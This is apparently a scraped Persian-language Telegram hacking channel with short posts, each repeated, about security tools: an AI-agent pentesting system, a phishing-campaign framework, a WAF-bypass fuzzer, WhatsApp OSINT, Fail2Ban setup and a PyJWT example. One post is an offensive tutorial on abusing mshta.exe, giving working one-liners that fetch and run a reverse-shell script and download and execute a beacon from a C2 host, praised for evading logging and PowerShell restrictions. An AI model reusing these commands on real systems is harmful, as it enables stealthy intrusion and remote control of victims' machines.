🤖 ؛PentAGI: سیستم چندعاملی برای تست نفوذ خودکار
🔺این ابزار از عاملهایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده میکند. این عاملها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار میکنند، خود تصمیمگیری میکنند و وظایف را انجام میدهند.
⚙ قابلیتها:
معماری چندعاملی: عوامل مختلف مسئولیتهای مختلفی مانند جمعآوری اطلاعات، اسکن و بهرهبرداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدلهای کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیتهای عوامل به صورت زنده.
🔗 GitHub: PentAGI
🔺این ابزار از عاملهایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده میکند. این عاملها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار میکنند، خود تصمیمگیری میکنند و وظایف را انجام میدهند.
⚙ قابلیتها:
معماری چندعاملی: عوامل مختلف مسئولیتهای مختلفی مانند جمعآوری اطلاعات، اسکن و بهرهبرداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدلهای کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیتهای عوامل به صورت زنده.
🔗 GitHub: PentAGI
t.me/Hack4Man
🔥3❤2👍1
💡ترفند: mshta - ایجاد یک شل معکوس از طریق برنامه HTML
🔺فکر میکنید mshta.exe فقط برای اجرای فایلهای .hta استفاده میشود؟ خندهدار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که میتواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود میشود و حتی زمانی که PowerShell غیرفعال است، کار میکند. بریم سراغش!
🔺؛mshta چه قابلیتهایی دارد (و چرا این موضوع عالی است)
1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
این دستور cmd.exe را اجرا میکند و whoami را اجرا میکند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.
2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
🔺این اسکریپت را از حافظه دانلود و اجرا میکند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمیشود.
3⃣ دانلود بار مفید از یک سرور از راه دور
🔺ترکیب mshta و certutil به شما امکان میدهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.
🔺فکر میکنید mshta.exe فقط برای اجرای فایلهای .hta استفاده میشود؟ خندهدار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که میتواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود میشود و حتی زمانی که PowerShell غیرفعال است، کار میکند. بریم سراغش!
🔺؛mshta چه قابلیتهایی دارد (و چرا این موضوع عالی است)
1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c whoami",1,true);close()این دستور cmd.exe را اجرا میکند و whoami را اجرا میکند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.
2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://c2.com/rev.ps1')",0,true);close()🔺این اسکریپت را از حافظه دانلود و اجرا میکند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمیشود.
3⃣ دانلود بار مفید از یک سرور از راه دور
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe && beacon.exe",0,true);close()🔺ترکیب mshta و certutil به شما امکان میدهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.
t.me/Hack4Man
❤6
؛Phishing Frenzy — یک چارچوب برای حملات فیشینگ
🔺؛Phishing Frenzy یک ابزار قدرتمند و متنباز است که برای ایجاد و مدیریت کمپینهای فیشینگ طراحی شده است.
🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار میدهد، از جمله ایجاد وبسایتهای جعلی، ارسال ایمیلهای فیشینگ و ردیابی نتایج حملات.
📌لینک گیت هاپ
🔺؛Phishing Frenzy یک ابزار قدرتمند و متنباز است که برای ایجاد و مدیریت کمپینهای فیشینگ طراحی شده است.
🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار میدهد، از جمله ایجاد وبسایتهای جعلی، ارسال ایمیلهای فیشینگ و ردیابی نتایج حملات.
📌لینک گیت هاپ
t.me/Hack4Man
❤1
📦 کتابخانه روز: PyJWT — کار با توکنهای وب JSON
؛JWT یک استاندارد برای انتقال امن دادهها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکنها است.
نصب:
مثال: ایجاد و بررسی توکن:
# 1. ایجاد توکن
# 2. بررسی توکن
؛JWT یک استاندارد برای انتقال امن دادهها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکنها است.
نصب:
pip install pyjwtمثال: ایجاد و بررسی توکن:
import jwt
import datetime
SECRET_KEY = "your-secret-key"
# 1. ایجاد توکن
payload = {
"user_id": 123,
"username": "alex",
"exp": datetime.datetime.now(datetime.UTC) + datetime.timedelta(hours=1)
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(f"توکن: {token}")# 2. بررسی توکن
try:
decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
print(f"سلام، {decoded['username']}!")
except jwt.ExpiredSignatureError:
print("توکن منقضی شده است")
except jwt.InvalidTokenError:
print("توکن نامعتبر است")
t.me/Hack4Man
❤4
📊یک ترمینال، مانیتورینگ مستقل را ارائه میدهد – نیازی به اجرای برنامههایی مانند htop، iotop، nethogs و df نیست.
🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسکها، شبکه، دما و باتری؛ قابل اجرا در سیستمعاملهای Linux، macOS و Windows.
🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتبسازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.
🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسکها با قابلیت نمایش تاریخچه.
🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگنمایی زمانی.
📥 لینک به گیتهاپ
📌قابلیت سفارشیسازی در سطح تمها، ویجتها و فرکانس بهروزرسانی. از ماوس پشتیبانی میشود.
🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسکها، شبکه، دما و باتری؛ قابل اجرا در سیستمعاملهای Linux، macOS و Windows.
🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتبسازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.
🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسکها با قابلیت نمایش تاریخچه.
🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگنمایی زمانی.
📥 لینک به گیتهاپ
📌قابلیت سفارشیسازی در سطح تمها، ویجتها و فرکانس بهروزرسانی. از ماوس پشتیبانی میشود.
t.me/Hack4Man
❤2
🛡؛PatchMon: مدیریت متمرکز بهروزرسانیها در محیطهای سرور
🔺این ابزار برای مدیران سیستم و تیمهای امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز بهروزرسانیها را در سرورهای مختلف فراهم میکند. عوامل (agents) فقط از طریق کانالهای خروجی با سرور PatchMon ارتباط برقرار میکنند، بنابراین نیازی به باز کردن پورتها و مواجهه با خطرات امنیتی نیست.
قابلیتها:
🔗 GitHub: PatchMon/PatchMon
🔺این ابزار برای مدیران سیستم و تیمهای امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز بهروزرسانیها را در سرورهای مختلف فراهم میکند. عوامل (agents) فقط از طریق کانالهای خروجی با سرور PatchMon ارتباط برقرار میکنند، بنابراین نیازی به باز کردن پورتها و مواجهه با خطرات امنیتی نیست.
قابلیتها:
مدیریت متمرکز پچها در تعداد زیادی سرور
عوامل از طریق اتصالات خروجی کار میکنند (بدون نیاز به پورتهای باز)
نمایش کامل وضعیت بهروزرسانیها
خودکارسازی ایمن فرآیندها
🔗 GitHub: PatchMon/PatchMon
t.me/Hack4Man
❤3
✅ WhatsApp-OSINT
این ابزار، عکسهای پروفایل واتساپ را دریافت میکند، حسابهای تجاری را بررسی میکند، وضعیت کاربران را تعیین میکند و دستگاههای مرتبط را از طریق رابط OSINT شرکت RapidAPI تجزیه و تحلیل میکند.
📁 زبان: پایتون
⭐️ تعداد ستارهها: 973
⬅️ لینک گیتهاب
این ابزار، عکسهای پروفایل واتساپ را دریافت میکند، حسابهای تجاری را بررسی میکند، وضعیت کاربران را تعیین میکند و دستگاههای مرتبط را از طریق رابط OSINT شرکت RapidAPI تجزیه و تحلیل میکند.
📁 زبان: پایتون
⭐️ تعداد ستارهها: 973
⬅️ لینک گیتهاب
t.me/Hack4Man
❤3
🛡 پیکربندی Fail2Ban در لینوکس: محافظت از سرور در برابر حملات brute-force در 5 دقیقه
؛Fail2Ban، لاگهای سرویسهای سیستم را تحلیل میکند، فعالیتهای مشکوک را شناسایی کرده و به طور خودکار آدرسهای IP مهاجمان را مسدود میکند.
پیکربندی سریع:
# ایجاد فایل پیکربندی محلی
# ویرایش قوانین
پیکربندی برای SSH:
اجرا و مدیریت:
# شروع و فعالسازی خودکار
# بررسی وضعیت
# مشاهده آدرسهای IP مسدود شده
؛Fail2Ban، لاگهای سرویسهای سیستم را تحلیل میکند، فعالیتهای مشکوک را شناسایی کرده و به طور خودکار آدرسهای IP مهاجمان را مسدود میکند.
پیکربندی سریع:
# ایجاد فایل پیکربندی محلی
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
# ویرایش قوانین
sudo nano /etc/fail2ban/jail.local
پارامترهای پایه (در ابتدای فایل):
bantime = 10m # مدت زمان مسدودسازی
findtime = 10m # بازه زمانی تحلیل
maxretry = 5 # تعداد تلاشها قبل از مسدودسازی
پیکربندی برای SSH:
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 5
اجرا و مدیریت:
# شروع و فعالسازی خودکار
sudo systemctl start fail2ban
sudo systemctl enable fail2ban
# بررسی وضعیت
sudo systemctl status fail2ban
# مشاهده آدرسهای IP مسدود شده
sudo fail2ban-client status sshd
t.me/Hack4Man
❤8
💻 ابزار باجافزار Matrix — مجموعهای از ابزارهای باجافزار
ابزار باجافزار Matrix یک مخزن جامع است که شامل فهرستبندی ابزارها و روشهای مورد استفاده توسط گروههای مختلف باجافزار و سازمانهای مرتبط با آن میشود.
— این ابزار اهداف متعددی را دنبال میکند:
1. ارائه لیستی از ابزارها برای شناسایی تهدیدات در محیطهای مختلف؛
2. ارائه راهکارهایی برای واکنش به حوادث امنیتی؛
3. کمک به شناسایی الگوهای رفتاری در بین شاخههای مختلف باجافزار؛
4. ارائه منبعی برای تیمهای متخصص در زمینه امنیت سایبری که تحت رهبری تحلیلگران تهدیدات فعالیت میکنند.
📌 لینک به گیتهاپ
ابزار باجافزار Matrix یک مخزن جامع است که شامل فهرستبندی ابزارها و روشهای مورد استفاده توسط گروههای مختلف باجافزار و سازمانهای مرتبط با آن میشود.
— این ابزار اهداف متعددی را دنبال میکند:
1. ارائه لیستی از ابزارها برای شناسایی تهدیدات در محیطهای مختلف؛
2. ارائه راهکارهایی برای واکنش به حوادث امنیتی؛
3. کمک به شناسایی الگوهای رفتاری در بین شاخههای مختلف باجافزار؛
4. ارائه منبعی برای تیمهای متخصص در زمینه امنیت سایبری که تحت رهبری تحلیلگران تهدیدات فعالیت میکنند.
📌 لینک به گیتهاپ
t.me/Hack4Man
👍3❤1
💻 ؛REcollapse — دور زدن مکانیزمهای امنیتی با استفاده از فازینگ
🔺؛REcollapse یک ابزار کمکی برای پردازش عبارات با قاعده در حالت "جعبه سیاه" است که امکان دور زدن بررسیها و شناسایی نرمالسازیها را در برنامههای وب فراهم میکند.
🔺هدف این ابزار، تولید بار کاری (payload) برای تست است.
🔺این ابزار میتواند برای سرقت حسابهای کاربری بدون نیاز به تعامل کاربر، شناسایی راههای جدید برای دور زدن فایروالهای برنامههای وب و موارد دیگر استفاده شود.
📌 لینک گیتهاب
🔺؛REcollapse یک ابزار کمکی برای پردازش عبارات با قاعده در حالت "جعبه سیاه" است که امکان دور زدن بررسیها و شناسایی نرمالسازیها را در برنامههای وب فراهم میکند.
🔺هدف این ابزار، تولید بار کاری (payload) برای تست است.
🔺این ابزار میتواند برای سرقت حسابهای کاربری بدون نیاز به تعامل کاربر، شناسایی راههای جدید برای دور زدن فایروالهای برنامههای وب و موارد دیگر استفاده شود.
📌 لینک گیتهاب
t.me/Hack4Man